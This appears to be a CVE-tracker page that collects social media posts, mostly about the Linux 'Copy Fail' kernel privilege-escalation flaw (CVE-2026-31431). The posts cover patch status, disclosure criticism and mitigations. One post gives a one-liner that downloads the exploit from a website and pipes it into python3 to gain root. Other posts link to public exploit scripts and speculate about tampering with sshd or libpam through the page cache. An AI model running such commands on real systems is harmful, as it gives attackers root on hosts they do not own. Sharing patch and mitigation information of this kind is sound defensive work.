Overview
Description
Statistics
- 103 Posts
- 564 Interactions
Fediverse
Copy Fail (CVE-2026-31431) has just been patched on Debian 13, with kernel version 6.12.85-1 from trixie (security).
The CopyFail announcement and handling is one of the least defender-supporting I think I've ever seen.
Mitigations were extremely thin at launch, and haven't improved much, and are even brittle and misleading:
https://infosec.exchange/@tychotithonus/116490466168316767
They've also largely neglected most of the value of the feedback they're getting from defenders clamoring for useful intel. The GitHub repo is full of feedback about which distros are affected or unaffected ... and a day later, none of it has been used to update the list of affected versions in the main README (except for the RHEL made-up version fix)
And this exchange is painful:
https://github.com/theori-io/copy-fail-CVE-2026-31431/issues/12
"None of us are RH people so it wasn't caught" 😐 You had weeks do basic vetting, or find someone who would help you.
Theori seems to have to have intended this to be a showcase for their product. Instead, it has convinced me that I will never buy anything from them.
Edit: Will Dorman goes into more detail here, 100% agreed:
https://infosec.exchange/@wdormann/116493725294723695
Si sois sysadmins de Linux mejor no hagáis planes para el puente... https://copy.fail/
Copy Fail (CVE-2026-31431) is a Linux kernel vulnerability that allows local unprivileged users to gain root access on affected systems.
https://linuxiac.com/copy-fail-linux-kernel-flaw-allows-local-users-to-gain-root/
It's crazy that the researchers who discovered Copy Fail only worked with the Linux Kernel Organization to patch it in the mainline kernel but didn't work with any of the major distros to make sure a patch was available before disclosing the exploit. Unless you're running a rolling distro, a dev version or a distro with short release windows, it's effectively an unpatched zeroday.
The ones most vulnerable to this are the type of systems that run on long term release kernels, not rolling releases or short release distros like Fedora.
This whole saga is a big clusterfuck for the Linux community to scramble to patch this major flaw.
#Linux #CopyFail #CVE_2026_31431 #infosec #cybersec
RE: https://infosec.exchange/@BleepingComputer/116493995434262191
Критическая уязвимость!
(linux)
Почти любой дистро уязвим
CVE-2026-31431 (copyfail)
Чел с доступом к терминалу (любой юзер) может получить рут
Тестировать можно этим кодом
https://github.com/theori-io/copy-fail-CVE-2026-31431/blob/main/copy_fail_exp.py
обновляйтесь быстро!
И репостните чтоб не проспали люди. Тыкните друзей кто линуксоид
RedHat https://access.redhat.com/security/cve/cve-2026-31431
Debian https://security-tracker.debian.org/tracker/CVE-2026-31431
Ubuntu https://ubuntu.com/security/CVE-2026-31431
Suse: https://www.suse.com/security/cve/CVE-2026-31431.html
Arch: https://security.archlinux.org/CVE-2026-31431
Fedora fixed: https://bugzilla.redhat.com/show_bug.cgi?id=2460538
Probably Greg Kroah-Hartman or Herbert Xu would be the best source, I guess. 🤔
copy.fail (CVE-2026-31431) explained: a small Linux kernel bug with an unusually big blast radius
https://jorijn.com/en/blog/copy-fail-cve-2026-31431-linux-kernel-bug-explained/
The GitHub issues for the copyfail PoC script are fun, including this one, aptly titled "Golf Harder": https://github.com/theori-io/copy-fail-CVE-2026-31431/pull/5
Un kernel patché est dispo pour #Debian 13 (Trixie security) : https://security-tracker.debian.org/tracker/CVE-2026-31431 #CopyFail
RE: https://mastodon.social/@Viss/116490543256385246
From my reading, this is my understanding as well. You don't have to have root, and you can modify anything in the page cache. Like ... sshd, or libpam, or anything called by a cron job that's running as root.
How can we definitively confirm this?
Raspberry Pi folks worried about CVE-2026-31431 'copy fail'.
Add this to the end of the line in /boot/firmware/cmdline.txt
initcall_blacklist=algif_aead_init
Then reboot with sudo systemctl reboot.
Check that it worked with
dmesg | fgrep 'blacklisting initcall algif_aead_init'
expect to see
[ 0.000000] blacklisting initcall algif_aead_init
You're now good against this issue.
No official announcement yet, but Copy Fail (CVE-2026-31431) has already been fixed in the Fedora kernels: 6.19.12. According to Red Hat / Fedora kernel tracking, "all current Fedora branches are already at or beyond kernel 6.19.12.
TL;DR - If your Fedora system is fully updated, you are already protected against Copy Fail.
Fresh gist: mitigating CVE-2026-31431 ("Copy Fail") on RHEL 8/9/10 with a tiny Ansible playbook.
It blacklists algif_aead via a kernel boot arg (initcall_blacklist=algif_aead_init), reboots only when needed, and asserts the mitigation actually stuck after reboot. Idempotent & safe to re-run.
https://codeberg.org/Larvitz/gists/src/branch/main/2026/20260501-CVE-2026-31431_RHEL_Mitigation.md
#Ansible #RHEL #Linux #InfoSec #SysAdmin #DevOps #CVE #CVE_2026_31431 #copyfail
Linux Kernel Zero-Day “Copy Fail” (CVE-2026-31431) Grants Root Access on Every Major Distro Since 2017
#CyberSecurity
https://securebulletin.com/linux-kernel-zero-day-copy-fail-cve-2026-31431-grants-root-access-on-every-major-distro-since-2017/
Debian's patched 6.12.85+deb13-amd64 #1 SMP PREEMPT_DYNAMIC seems GTG with the PoC published here:
https://github.com/theori-io/copy-fail-CVE-2026-31431/blob/main/copy_fail_exp.py
```
root@cake:~# su - eat
eat@cake:~$ vim foo.py
eat@cake:~$ cat foo.py | python3 && su
Password: su: Authentication failure
Password:
```
Bit worried about where Ubuntu is at. Ominously, their own fix announcement page seems down:
https://ubuntu.com/blog/copy-fail-vulnerability-fixes-available
Allows overwriting bytes in the shared page cache. A compromised Docker container or local process can now get full root on the host; disk integrity checks won’t see it.
**It’s patched — but not fixed — until you reboot.**
Distros are now shipping updated kernels.
Check kernel version:
uname -v
if older than Apr 22, 2026, you're likely still vulnerable
You must update the kernel package AND reboot the host. Restarting containers or services is not enough.
Treat this as critical if you self-host public services.
#Linux #InfoSec #CVE202631431 #CopyFail #SelfHosted #Docker #Kubernetes
Yet another nasty #Linux root access vulnerability (local, not remote)
Faille de sécurité dans tous les linux depuis 2017 permettant un accès administrateur depuis n'importe quel compte utilisateur:
https://security-tracker.debian.org/tracker/CVE-2026-31431
https://copy.fail/
$ curl https://copy.fail/exp | python3 && su
Die Entdecker nennen die Lücke "Copy Fail": Ein 732-Byte-Python-Exploit erlaubt lokalen Root-Zugriff auf viele Linux-Distributionen seit 2017. CVE-2026-31431 (CVSS 7.8). Update-Kernel dringend empfohlen; Workarounds: algif_aead blacklisten / seccomp. 🔓🐧⚠️ #Linux #Cybersecurity #CVE2026-31431 https://www.heise.de/news/Copy-Fail-Linux-root-in-allen-grossen-Distributionen-mit-732-Byte-Python-11277590.html
1/2 Fix bellow
Researchers disclose "Copy Fail": a Linux privilege-escalation (CVE-2026-31431) where a 732‑byte Python PoC grants local root and affects major distros since 2017; kernel patches are available—temporary mitigation: block AF_ALG / blacklist algif_aead. Full report: https://www.heise.de/en/news/Copy-Fail-Linux-root-in-all-major-distributions-with-732-bytes-of-Python-11277657.html 🔒🐧 #Linux #infosec
1/2 Fix bellow
CRITICAL Vulnerability!
Almost any linux distro is vulnerable!
CVE-2026-31431 (copyfail)
any user with any access to terminal can get root
Test with this code
https://github.com/theori-io/copy-fail-CVE-2026-31431/blob/main/copy_fail_exp.py
Update! And repost pls. Damn, thats fucked up.
@dangoodin Tenebale has a listing of states of patching in this article: https://www.tenable.com/blog/copy-fail-cve-2026-31431-frequently-asked-questions-about-linux-kernel-privilege-escalation
https://security-tracker.debian.org/tracker/CVE-2026-31431
Patched kernel for Debian 13 Trixie
The fix for the wild CVE (CVE-2026-31431) is out for #Ubuntu
You should apply it *now*
CopyFail (CVE-2026-31431) ist eine kritische Sicherheitslücke im Linux-Kernel. Sie ermöglicht es einem lokalen Angreifenden ohne Administratorrechte, sich vollständigen Root-Zugriff auf das System zu verschaffen.
Mehr: https://maniabel.work/archiv/1520
#LinuxKernel #CopyFail #Exploit #BeDiS #up2date
For those wondering when #Debian will have patches for #CopyFaill, I've been following this page:
https://security-tracker.debian.org/tracker/CVE-2026-31431
Trixie just got patched. Still waiting for Bookworm.
:nugget: CVE-2026-31431 https://copy.fail/
I cannot believe this 0day happened a few days after I updated everything... good news is.. I can update with zero downtime for the most part.
If you notice a small outage, it should take a minute at max but I'll try to keep it small.
Oof, an undiscovered zero-day in the Linux kernel discovered that affects every distribution since 2017 and it's being called Copy Fail which can authenticate non-root users with a normal local account.
https://www.bugcrowd.com/blog/what-we-know-about-copy-fail-cve-2026-31431/
https://thehackernews.com/2026/04/new-linux-copy-fail-vulnerability.html
Zumindest #Debian hat das Problem CVE-2026-31431 beseitigt:
https://security-tracker.debian.org/tracker/CVE-2026-31431
Docker Engine is safe against CVE-2026-31431 now.
Patch ASAP:
https://github.com/moby/moby/releases/tag/docker-v29.4.2
@maddiefuzz Yes it is https://security-tracker.debian.org/tracker/CVE-2026-31431 but that's ok, vulnerabilities happen :).
The toot was more about the calm and demure aspect of admin-ing a Debian and using it for development. I've found it tends to pay off to learn a distro and stick with it 🤓. Debian as a desktop/dev environment is also a fantastic option
@rysiek there's the deobfuscated python code in a GitHub issue: https://github.com/theori-io/copy-fail-CVE-2026-31431/issues/54
My guess is that they compressed it so they can get it down to the 732 byte size, as if anyone really cares about that these days.
For testing the Linux vulnerability (recently disclosed as "Copy Fail CVE-2026-31431"), I booted my notebook computer up with a live DVD, so the exploit I am testing should not get saved to the machine.
Will Linux Mint 21.2 succumb to the exploit?
My reply shows the result....
Linux computers, even fully patched, are vulnerable to the "Copy Fail CVE-2026-31431" exploit.
A temporary fix is shown on askubuntu.com.
https://askubuntu.com/questions/1566254/how-do-i-fix-cve-2026-31431-on-ubuntu-24-04-lts
@weyoun6 Then you're solid.
This post has the best details about mitigations I've seen:
#CopyFail #cve_2026_31431 I wrote about denying containers access to AF_ALG sockets with SELinux
https://blog.feistel.party/2026/04/30/deny-alg-socket-to-containers-with-selinux-to-mitigate-cve-2026-31431.html
Patrzę co bym musiał spaczować...
A tu wszystko spaczowane... życie z rolling release.
Copy Fail: The 732-Byte Script That Roots Every Major #Linux Systems
https://ostechnix.com/copy-fail-cve-2026-31431-linux-kernel-root-exploit/
Copy Fail – CVE-2026-31431
https://piefed.social/c/selfhosted/p/2026153/copy-fail-cve-2026-31431
the line between #vulnerability #disclosure and #AI #advertisement becomes ever more blurry ....
#thereIsNoAI
#thereIsInParticularNoSustainableAI
#alsoNoReponsibleAI
CVE-2026-31431 #copyFail
The https://copy.fail/ website for the Linux CVE CVE-2026-31431 reeks of AI and is absolutely distasteful with its boasting about the severity and explainers that have no clear target audience
No warranty implied, use at your own risk. But this short C program can check if your Linux machine is still vulnerable to Copy Fail (there's also this page with python code from our friends in Estonia https://docs.hpc.ut.ee/public/cve-2026-31431/ )
Output includes "ARE available" or "NOT available"
Again: compile and run at your own risk. Don't just trust me blindly. Read the code. #CopyFail #CVE-2026-31431
==============
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/if_alg.h>
int main(void) {
int sock;
struct sockaddr_alg sa;
// Prepare sockaddr_alg for AEAD/GCM
memset(&sa, 0, sizeof(sa));
sa.salg_family = AF_ALG;
strcpy((char *)sa.salg_type, "aead");
strcpy((char *)sa.salg_name, "gcm(aes)");
// Try to create AF_ALG socket
sock = socket(AF_ALG, SOCK_SEQPACKET, 0);
if (sock == -1) {
perror("socket(AF_ALG, aead)");
printf("algif_aead functions are NOT available (AF_ALG socket creation failed).\n");
return 1;
}
// Try to bind to AEAD/GCM
if (bind(sock, (struct sockaddr *)&sa, sizeof(sa)) == -1) {
perror("bind(AF_ALG, aead, gcm(aes))");
printf("algif_aead functions are NOT available (bind failed).\n");
close(sock);
return 1;
}
printf("algif_aead functions ARE available (AF_ALG AEAD bind succeeded).\n");
close(sock);
return 0;
}
So this tiny piece of Python code is responsible for Copy Fail (CVE-2026-31431)? I am considering testing this on one of my own machines to see if the exploit actually works. If it does, I will post a follow-up to warn others.
Protege tu Linux de CVE2026-31431 CopyFail
https://www.youtube.com/watch?v=9BGsC4lIIf4
Toch altijd wel knap wat hackers weten te vinden.
'Most Linux LPEs need a race window or a kernel-specific offset. Copy Fail is a straight-line logic flaw — it needs neither. The same 732-byte Python script roots every Linux distribution shipped since 2017.'
"Copy Fail — CVE-2026-31431"
OhMyDebn 3.6.3 now available with Copy Fail CVE-2026-31431 exploit mitigation, OpenCode 1.14.30, and Aether 4.15.3!
OhMyDebn is a debonair Linux desktop for power users. It gives you the stability of the Debian distro, the ease of use of the Cinnamon desktop, and the power of AI, containers, and virtualization.
linux kernel question regarding #copyfail CVE-2026-31431 I just tested a c version of the exploit (https://github.com/tgies/copy-fail-c) on a riscv64 linux 5.10.4 (milkv-duo) and get
```
[+] target: /bin/su
[+] payload: 2064 bytes (516 iterations)
socket(AF_ALG): Address family not supported by protocol
patch_chunk failed at offset 0
```
I tested it on another risc64 SBC with a newer kernel which gained root but it seems like the exploit doesn't work on this kernel.
Copy Fail (CVE-2026-31431) is a severe logic flaw in the Linux kernel affecting almost every distribution since 2017. Patch your system immediately!
More details here: https://ostechnix.com/copy-fail-cve-2026-31431-linux-kernel-root-exploit/
#Copyfail #CVE202631431 #Pagecache #Linuxkernel #LinuxPrivilegeEscalation #Security #XintCode #TaeyangLee
@isabel lest anyone get the wrong impression, NixOS is not immune in general https://github.com/theori-io/copy-fail-CVE-2026-31431/issues/48
Xint Code disclosed CopyFail (CVE-2026-31431) Wednesday. A logic bug in algif_aead, the kernel's crypto socket layer, from a 2017 in-place optimization. Nine years on every major Linux distribution. The exploit is 732 bytes of Python. No offsets, no race window. Static analysis missed it. Fuzzing missed it. AI-assisted review caught it. Rust would not have, this is logic, not memory. The Rust-versus-C debate distracted from where logic bugs actually live.
@mntmn looks like there’s an aarch64 port https://github.com/theori-io/copy-fail-CVE-2026-31431/pull/25
Is ubuntu.com down for anyone else? Wanted to check for #CopyFail fix information at ubuntu.com/security/CVE-2026-31431
#ubuntu #isItDownRightNow ?
Uuuuhhhhh, this is bad:
https://youtu.be/PFLpDc909yY
#copyfail #linux #cve_2026_31431
It would be interesting to see whether the copy-fail vuln (CVE-2026-31431) could be used to root an Android phone. I am a bit reluctant to install Magisk on my primary Android device, would love to see if the vuln could be an alternative. Lmao.
@ctoney Just wondering the same. Seems Ubuntu LTS remains non-fixed?
Ubuntu's grandmother Debian seems on top of things.
Tested the oft cited PoC (https://github.com/theori-io/copy-fail-CVE-2026-31431/blob/main/copy_fail_exp.py) on patched 6.12.85+deb13-amd64 for Trixie:
```
root@cake:~# su - eat
eat@cake:~$ vim foo.py
eat@cake:~$ cat foo.py | python3 && su
Password: su: Authentication failure
Password:
```
Copy Fail (CVE-2026-31431): 732 bajty do przejęcia kontroli nad systemem ( https://nfsec.pl/security/6718 ) #linux #kernel #exploit
Can someone explain to me why #copyfail was still unpatched on so many distros this morning when the blog post claims it was reported over a month ago to the kernel security team?
copy-fail-CVE-2026-31431/copy_fail_exp.py at main · theori-io/copy-fail-CVE-2026-31431 · GitHub
https://github.com/theori-io/copy-fail-CVE-2026-31431/blob/main/copy_fail_exp.py
@hillu@infosec.exchange It is my understanding that this will not work. There is a published exploit (https://github.com/rootsecdev/cve_2026_31431/blob/main/exploit_cve_2026_31431.py) that messes with the page cache for /etc/passwd to simply show your user id as 0, so a normal call to su will make you root.
@ubuntu Can you share when the updated packages to mitigate #CVE202631431 are likely to drop?
Copy-fail: local privilege escalation in every Linux distro since 2017.
It is local, but shockingly easy to exploit.
Exploit: https://github.com/theori-io/copy-fail-CVE-2026-31431/blob/main/copy_fail_exp.py
HackerNews: https://news.ycombinator.com/item?id=47952181
So... dealing with CVE-2026-31431 and I'm annoyed:
- I see vulnerable kernel versions in Debian, but MY kernel (as "uname -sr" tells me) is different
- yet my kernel on the system I tested was clearly faulty, as the exploit worked (and then didn't work when I employed the workaround)
So I need this workaround at least for now until a new kernel comes out (and I probably still won't let algif_aead insert after that anyway)
CVE-2026-31431 - crypto: algif_aead - Revert to operating out-of-place
🔗 https://vulnerability.circl.lu/vuln/CVE-2026-31431#comments
📰 Critical 'Copy Fail' Linux Flaw (CVE-2026-31431) Gives Instant Root on Major Distros
⚠️ Critical 'Copy Fail' Linux flaw (CVE-2026-31431) allows any local user to get instant root access! Affects distros since 2017 like Ubuntu, Debian, RHEL. A simple, reliable exploit exists. Patch now! #Linux #CyberSecurity #LPE
Copy Fail : cette redoutable faille Linux permet d’obtenir un accès root https://www.it-connect.fr/copy-fail-cve-2026-31431-linux-access-root-vulnerabilite/ #ActuCybersécurité #Cybersécurité #Vulnérabilité #Linux
Also, doesn't the OS prioritize not flushing some files from the page cache, such as the "hottest" files? Could this be leveraged by the attacker to maximize persistence? Or even take steps to ensure the file is always in cache, like regularly reading it or something?
Hot new Linux vuln just dropped:
https://copy.fail/
CVE-2026-31431
Root access & container escape
Copy Fail Linux vuln allows root access
Yesterday, Theori disclosed CVE-2026-31431, dubbed Copy Fail, a Linux kernel vulnerability that allows any unprivileged local user to gain root access on virtually every major Linux distribution shipped since 2017. In the Linux kernel, the following vulnerability has been resolved: crypto: algif_aead - Revert to operating out-of-place This mostly reverts commit 72548b093ee3 except for the copying of the associated data.
https://itnerd.blog/2026/04/30/copy-fail-linux-vuln-allows-root-access/
Let me be clear, I am not shocked that the CERT-EU article for CVE-2026-31431 has mitigation steps, while most others still haven’t acknowledged it sufficiently. https://cert.europa.eu/publications/security-advisories/2026-005/
https://www.reddit.com/r/androidroot/comments/1szlzjj/does_copy_fail_cve202631431_affect_android_devices/
you cant access af_alg on non root
Checking the #CopyFail #CVE_2026_31431 status on #AlpineLinux, again nothing heard officially from @alpinelinux but I did see this:
https://github.com/theori-io/copy-fail-CVE-2026-31431/issues/4#issuecomment-4354558846
Maybe the issue has been quietly dealt with or was never an issue to begin with? It'd be nice to know for certain.
En las últimas 24 horas se han detectado vulnerabilidades críticas que afectan sistemas Linux, cPanel, routers de Solana y Adobe Acrobat, exponiendo a usuarios a escalada de privilegios, suplantación de autenticación, robo de tokens y ejecución remota de código; además, se reportan fallos en Cloudflare y un malware avanzado que amenaza sectores científicos. Descubre estos y más detalles en el siguiente listado de noticias sobre seguridad informática:
🗞️ ÚLTIMAS NOTICIAS EN SEGURIDAD INFORMÁTICA 🔒
====| 🔥 LO QUE DEBES SABER HOY 30/04/26 📆 |====
🔒 COPY FAIL — 732 BYTES TO ROOT
Se ha descubierto una vulnerabilidad crítica en Linux (CVE-2026-31431) que permite escalar privilegios a nivel root sin riesgo de condiciones de carrera ni necesidad de usar offsets. Esta falla evade las herramientas de integridad de archivos en disco y afecta incluso a entornos aislados como contenedores, representando un riesgo grave para la seguridad de sistemas Linux. Detectada por Xint Code, es esencial actualizar y proteger su infraestructura cuanto antes. Descubre más sobre esta vulnerabilidad y su impacto aquí 👉 https://djar.co/3ckGrI
🌐 LA INTERNET ESTÁ CAYENDO, CAYENDO, CAYENDO (CVE-2026-41940 EN CPANEL Y WHM)
Una falla de suplantación de autenticación ha sido identificada en cPanel y WHM, dos herramientas clave para la gestión de hosting. Esta vulnerabilidad permite a atacantes no autenticados obtener sesiones de usuario, inclusive con privilegios de administrador root, mediante un bypass completo en la autenticación. La amenaza compromete la seguridad de miles de servidores web, por lo que se recomienda aplicar los parches disponibles de inmediato. Infórmate sobre cómo proteger tus sistemas aquí 👉 https://djar.co/ScQtAV
🔗 VULNERABILIDAD EN EL ROUTER DE SOLANA
Importantes fallos de seguridad han sido detectados en el enrutador de la red Solana, facilitando el drenaje de cuentas de tokens y poniendo en riesgo la integridad de las transacciones financieras dentro de esta blockchain. Estas vulnerabilidades críticas podrían comprometer fondos y confianza en la plataforma, por lo que es imprescindible que los usuarios y desarrolladores tomen medidas urgentes para mitigar estos riesgos. Detalles y recomendaciones aquí 👉 https://djar.co/2clAA
📄 TRES VULNERABILIDADES EN ADOBE ACROBAT QUE COMPROMETEN SEGURIDAD
Adobe ha revelado tres vulnerabilidades críticas (CVE-2026-34621, CVE-2026-34622, CVE-2026-34626) que permiten la ejecución remota de código y la filtración de información mediante archivos PDF maliciosos. Estos fallos afectan versiones populares como Acrobat DC y Reader DC, poniendo en riesgo a millones de usuarios que manejan documentos digitales. Actualizar a la última versión es fundamental para evitar intrusiones y pérdidas de datos. Conoce los detalles y actualizaciones disponibles aquí 👉 https://djar.co/Rvvu5
🏛️ LA ESTRATEGIA DEL CONGRESO CONTRA BLOQUEOS MASIVOS DE IP POR LALIGA
El Congreso ha aprobado una reforma a la Ley de Servicios Digitales para evitar bloqueos masivos de direcciones IP que afecten a páginas ajenas en procesos contra la piratería, buscando un equilibrio entre la protección de derechos y la seguridad en internet. Esta medida evita que resoluciones judiciales derriben sitios web de terceros y promueve un entorno digital más seguro y regulado. Entiende el alcance y las implicaciones de esta reforma aquí 👉 https://djar.co/8dbV
☁️ VULNERABILIDADES CRÍTICAS EN LA IMPLEMENTACIÓN DE CLOUDFLARE
Se han reportado vulnerabilidades en los proxies de autorización y archivos PAC alojados por Cloudflare que afectan la gestión de políticas de seguridad de identidad sin necesidad de clientes en dispositivos finales. Estas fallas, aunque técnicas, representan un avance en cómo se protegen las redes y requieren atención para evitar posibles explotaciones. Mantente informado sobre cómo estas vulnerabilidades impactan la seguridad del entorno web aquí 👉 https://djar.co/Y6uR
🐛 DETECTANDO LA AMENAZA DEL MALWARE FAST16
Un malware avanzado, posiblemente desarrollado o patrocinado por un estado, ha sido identificado causando sabotajes discretos mediante la manipulación de programas matemáticos y simulaciones físicas. Esta amenaza tiene potencial para generar fallos graves, afectando sectores científicos y tecnológicos sensibles. La detección y respuesta temprana son claves para mitigar el daño. Aprende cómo proteger tus sistemas frente a Fast16 aquí 👉 https://djar.co/CN8X
Bluesky
Overview
Description
Statistics
- 25 Posts
- 21 Interactions
Fediverse
'The Internet is falling down': Critical cPanel CRLF injection vulnerability puts tens of millions of websites at risk of total compromise – hosting providers urged to apply CVE-2026-41940 patch immediately
https://www.techradar.com/pro/security/the-internet-is-falling-down-critical-cpanel-crlf-injection-vulnerability-puts-tens-of-millions-of-websites-at-risk-of-total-compromise-hosting-providers-urged-to-apply-cve-2026-41940-patch-immediately?utm_source=flipboard&utm_medium=activitypub
Posted into The Dark Side of the Internet @the-dark-side-of-the-internet-rhudaur
After the last bit of #cPanel news, I checked my own shared #WebHosting account to find that they have indeed followed the recommendations offered for a temporary fix and disabled all the admin port numbers for the console.
No sites are down, and email is working as expected... so it's just a matter of waiting for all of the fixes to roll out.
If you're a cPanel user and haven't yet checked accessibility and whether you've been upgraded, you might want to take a look.
cPanel shipped an emergency patch Tuesday for CVE-2026-41940 (CVSS 9.8) with active exploitation. Watchtowr posted a working proof-of-concept Wednesday. cpsrvd writes the session file to disk before checking the password. Inject CRLF bytes through the auth header, unsanitized data lands inside, user=root sticks, login proceeds as admin. Pre-auth file writes that store attacker data are a recurring pattern across hosting panels, not an edge case.
⚠️ Si vous administrez ou connaissez quelqu’un qui administre un ou des hébergements avec cPanel & WHM, attention : la vulnérabilité critique CVE-2026-41940 ( https://vulnerability.circl.lu/vuln/CVE-2026-41940 ) permets à un attaquant distant de contourner l’authentification et d’obtenir un accès administrateur sans identifiants.
L’exploitation se fait via les interfaces HTTPS exposées, sans interaction utilisateur, ce qui en fait un risque immédiat pour les serveurs accessibles depuis Internet.
Ce type de faille est particulièrement recherché par les cybercriminels et par certaines APT gravitant autour de la Russie : prise de contrôle d’hébergements, déploiement de webshells, détournement de domaines, modification DNS/mail, vol de données ou rebond vers d’autres systèmes.
À corriger en priorité : appliquez les versions corrigées, limitez l’accès à cPanel/WHM via VPN ou allowlist IP, et vérifiez les journaux d’accès.
⬇️
https://www.rapid7.com/blog/post/etr-cve-2026-41940-cpanel-whm-authentication-bypass/
Sicherheitslücke in cPanel: So schützt du deinen Webserver vor CVE-2026-41940
#technews #cybersecurity #sysadmin #cpanel #serversecurity #webhosting
En las últimas 24 horas se han detectado vulnerabilidades críticas que afectan sistemas Linux, cPanel, routers de Solana y Adobe Acrobat, exponiendo a usuarios a escalada de privilegios, suplantación de autenticación, robo de tokens y ejecución remota de código; además, se reportan fallos en Cloudflare y un malware avanzado que amenaza sectores científicos. Descubre estos y más detalles en el siguiente listado de noticias sobre seguridad informática:
🗞️ ÚLTIMAS NOTICIAS EN SEGURIDAD INFORMÁTICA 🔒
====| 🔥 LO QUE DEBES SABER HOY 30/04/26 📆 |====
🔒 COPY FAIL — 732 BYTES TO ROOT
Se ha descubierto una vulnerabilidad crítica en Linux (CVE-2026-31431) que permite escalar privilegios a nivel root sin riesgo de condiciones de carrera ni necesidad de usar offsets. Esta falla evade las herramientas de integridad de archivos en disco y afecta incluso a entornos aislados como contenedores, representando un riesgo grave para la seguridad de sistemas Linux. Detectada por Xint Code, es esencial actualizar y proteger su infraestructura cuanto antes. Descubre más sobre esta vulnerabilidad y su impacto aquí 👉 https://djar.co/3ckGrI
🌐 LA INTERNET ESTÁ CAYENDO, CAYENDO, CAYENDO (CVE-2026-41940 EN CPANEL Y WHM)
Una falla de suplantación de autenticación ha sido identificada en cPanel y WHM, dos herramientas clave para la gestión de hosting. Esta vulnerabilidad permite a atacantes no autenticados obtener sesiones de usuario, inclusive con privilegios de administrador root, mediante un bypass completo en la autenticación. La amenaza compromete la seguridad de miles de servidores web, por lo que se recomienda aplicar los parches disponibles de inmediato. Infórmate sobre cómo proteger tus sistemas aquí 👉 https://djar.co/ScQtAV
🔗 VULNERABILIDAD EN EL ROUTER DE SOLANA
Importantes fallos de seguridad han sido detectados en el enrutador de la red Solana, facilitando el drenaje de cuentas de tokens y poniendo en riesgo la integridad de las transacciones financieras dentro de esta blockchain. Estas vulnerabilidades críticas podrían comprometer fondos y confianza en la plataforma, por lo que es imprescindible que los usuarios y desarrolladores tomen medidas urgentes para mitigar estos riesgos. Detalles y recomendaciones aquí 👉 https://djar.co/2clAA
📄 TRES VULNERABILIDADES EN ADOBE ACROBAT QUE COMPROMETEN SEGURIDAD
Adobe ha revelado tres vulnerabilidades críticas (CVE-2026-34621, CVE-2026-34622, CVE-2026-34626) que permiten la ejecución remota de código y la filtración de información mediante archivos PDF maliciosos. Estos fallos afectan versiones populares como Acrobat DC y Reader DC, poniendo en riesgo a millones de usuarios que manejan documentos digitales. Actualizar a la última versión es fundamental para evitar intrusiones y pérdidas de datos. Conoce los detalles y actualizaciones disponibles aquí 👉 https://djar.co/Rvvu5
🏛️ LA ESTRATEGIA DEL CONGRESO CONTRA BLOQUEOS MASIVOS DE IP POR LALIGA
El Congreso ha aprobado una reforma a la Ley de Servicios Digitales para evitar bloqueos masivos de direcciones IP que afecten a páginas ajenas en procesos contra la piratería, buscando un equilibrio entre la protección de derechos y la seguridad en internet. Esta medida evita que resoluciones judiciales derriben sitios web de terceros y promueve un entorno digital más seguro y regulado. Entiende el alcance y las implicaciones de esta reforma aquí 👉 https://djar.co/8dbV
☁️ VULNERABILIDADES CRÍTICAS EN LA IMPLEMENTACIÓN DE CLOUDFLARE
Se han reportado vulnerabilidades en los proxies de autorización y archivos PAC alojados por Cloudflare que afectan la gestión de políticas de seguridad de identidad sin necesidad de clientes en dispositivos finales. Estas fallas, aunque técnicas, representan un avance en cómo se protegen las redes y requieren atención para evitar posibles explotaciones. Mantente informado sobre cómo estas vulnerabilidades impactan la seguridad del entorno web aquí 👉 https://djar.co/Y6uR
🐛 DETECTANDO LA AMENAZA DEL MALWARE FAST16
Un malware avanzado, posiblemente desarrollado o patrocinado por un estado, ha sido identificado causando sabotajes discretos mediante la manipulación de programas matemáticos y simulaciones físicas. Esta amenaza tiene potencial para generar fallos graves, afectando sectores científicos y tecnológicos sensibles. La detección y respuesta temprana son claves para mitigar el daño. Aprende cómo proteger tus sistemas frente a Fast16 aquí 👉 https://djar.co/CN8X
Bluesky
Overview
Description
Statistics
- 3 Posts
- 3 Interactions
Fediverse
https://www.akamai.com/blog/security-research/2026/apr/incomplete-patch-apt28s-zero-day-cve-2026-32202
Microsoft Confirms Active Exploitation of Windows Shell CVE-2026-32202 https://thehackernews.com/2026/04/microsoft-confirms-active-exploitation.html
Overview
- GitHub
- Enterprise Server
Description
Statistics
- 3 Posts
- 1 Interaction
Fediverse
@ben @jpmens Yes,; executing commands with parameters given by the user, without any escaping. https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
📰 Critical GitHub RCE Flaw (CVE-2026-3854) Allowed Full Server Compromise via Single 'git push'
💥 Critical RCE flaw in GitHub (CVE-2026-3854) allowed repo access via a single `git push` command! Affects GitHub.com & Enterprise Server. Patches are out, but 88% of internet-facing GHES are still vulnerable. #GitHub #RCE #DevSecOps
Overview
- Progress Software
- MOVEit Automation
Description
Statistics
- 2 Posts
Fediverse
🚨 CVE-2026-4670 (CVSS 9.8): CRITICAL auth bypass in MOVEit Automation (2025.0.0 < 2025.0.9, 2024.0.0 < 2024.1.8, prior). Patch pending — restrict access & monitor advisories. No known in-the-wild exploits. https://radar.offseq.com/threat/cve-2026-4670-cwe-305-authentication-bypass-by-pri-dff96cb4 #OffSeq #MOVEit #CVE20264670
Overview
- InternLM
- lmdeploy
Description
Statistics
- 1 Post
- 1 Interaction
Overview
- Totolink
- NR1800X
Description
Statistics
- 1 Post
- 1 Interaction
Fediverse
🔥 HIGH severity: CVE-2026-7548 hits Totolink NR1800X (9.1.0u.6279_B20210910) — remote command injection via setUssd in /cgi-bin/cstecgi.cgi. Exploit is public, no patch yet. Disable remote management ASAP! https://radar.offseq.com/threat/cve-2026-7548-command-injection-in-totolink-nr1800-9109fa5c #OffSeq #infosec #vuln #IoT
Overview
Description
Statistics
- 1 Post
- 1 Interaction
Fediverse
CISA just added CVE-2025-24054 to its Known Exploited Vulnerabilities catalog, mandating federal agencies patch Windows systems against an NTLM hash-leaking flaw already weaponized in the wild.
Read more: https://steelefortress.com/6o7x90
CyberDefense #InfoSec #Encryption #DataPrivacy #Privacy
Overview
Description
Statistics
- 1 Post
Fediverse
Today is the federal patch deadline for Apache ActiveMQ's Jolokia bug, CVE-2026-34197. Horizon3.ai traced the root cause back thirteen years. Shadowserver scanned 6,364 exposed instances April 19. Fortinet saw exploitation peak April 14. The Jolokia management API lets an attacker fetch a remote config and run OS commands as the broker. Long-deployed code does not earn trust by survival. I have audited this assumption out of every threat model I touch.
Overview
Description
Statistics
- 1 Post